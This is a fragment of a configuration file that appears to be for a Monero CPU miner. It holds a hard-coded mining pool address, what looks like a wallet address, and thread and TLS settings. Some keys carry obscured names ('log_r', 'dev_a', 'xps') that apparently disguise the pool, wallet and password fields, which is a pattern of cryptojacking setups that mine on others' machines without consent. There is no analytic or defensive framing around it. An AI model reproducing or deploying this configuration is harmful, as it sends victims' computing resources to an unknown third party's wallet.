"use_slow_memory" : "warn",
"aes_override" : null,
"tls_secure_algo" : true,
"tls_fingerprint" : "",
"use_tls" : false,
"call_timeout" : 10,
"retry_time" : 10,
"giveup_limit" : 0,
"bnice" : false,
"verbose_level" : 0,
"h_print_time" : 60,
"prefer_ipv4" : true,
"httpd_port" : 0,
"xps" : "x",
"log_r" : "94.23.251.22:3333",
"daemon_mode" : false,
"dev_a" : "45f2tc8ME3r3LKWe65hSxYDKvF9aMeFTRKDTBqvrfusXXrbBX4DtQnjXymmDd8FdU4cfYTrvHst4tRof74UAvJpk564mXWp",
"cpu_threads_conf" :
[
    { "low_power_mode" : true, "no_prefetch" : true, "affine_to_cpu" : 0 },
],
"output_file" : "",
